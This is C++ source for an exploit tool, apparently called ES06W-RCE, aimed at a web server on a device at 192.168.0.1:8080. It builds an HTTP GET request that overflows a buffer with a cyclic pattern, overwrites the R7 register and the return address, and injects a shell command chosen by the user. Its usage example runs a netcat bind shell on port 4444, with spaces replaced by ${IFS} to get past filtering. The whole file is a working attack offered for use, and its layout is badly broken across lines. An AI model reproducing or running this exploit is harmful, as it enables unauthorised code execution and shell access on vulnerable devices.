/
/
ES06W
-
RCE.cpp :
/
/
void ShowHelp()
{
printf(
"[+]Usage: ES06W-RCE.exe [Command]\n"
);
printf(
"[+]Example: ES06W-RCE.exe \"nc${IFS}-lp${IFS}4444${IFS}-e${IFS}/bin/sh\"\n"
);
}
int
main(
int
argc, char
*
*
argv)
{
WSADATA stcData
=
{};
int
int_ret
=
0
;
char str_recv[
0x1000
]
=
{};
char str_payload_final[
0x1000
]
=
{};
/
/
if
(argc !
=
2
) {
ShowHelp();
return
0
;
}
/
/
int_ret
=
WSAStartup(MAKEWORD(
2
,
2
), &stcData);
if
(int_ret
=
=
SOCKET_ERROR) {
printf(
"[-]Init Failed!\n"
);
return
0
;
}
/
/
char str_payload[]
=
{
"GET /aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHa"
"IaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbib"
"jbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTb"
"UbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccd"
"\xBC\x5F\xCB\x48"
/
/
Control R7
"\x94\x02\xD5\x48"
/
/
Return Addr
"%s"
/
/
Command
" HTTP/1.1\r\n"
"Host: 192.168.0.1:8080\r\n"
"Connection: keep-alive\r\n"
"Upgrade-Insecure-Requests: 1\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Language: zh-CN,zh;q=0.9\r\n\r\n\0"
};
sprintf_s(str_payload_final,
0x1000
, str_payload, argv[
1
]);
/
/
SOCKET sock_client
=
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in sock_addr;
sock_addr.sin_family
=
AF_INET;
sock_addr.sin_port
=
htons(
8080
);
sock_addr.sin_addr.S_un.S_addr
=
inet_addr(
"192.168.0.1"
);
/
/
int
nErrCode
=
0
;
int_ret
=
connect(sock_client, (sockaddr
*
)&sock_addr, sizeof(sockaddr_in));
/
/
send(sock_client, str_payload_final, strlen(str_payload_final),
0
);
/
/
Sleep(
20
);
recv(sock_client, str_recv, sizeof(str_recv),
0
);
printf(
"[-]Recv: %s\n"
, str_recv);
printf(
"[+]Finished!\n"
);
closesocket(sock_client);
WSACleanup();
/
/
return
0
;
}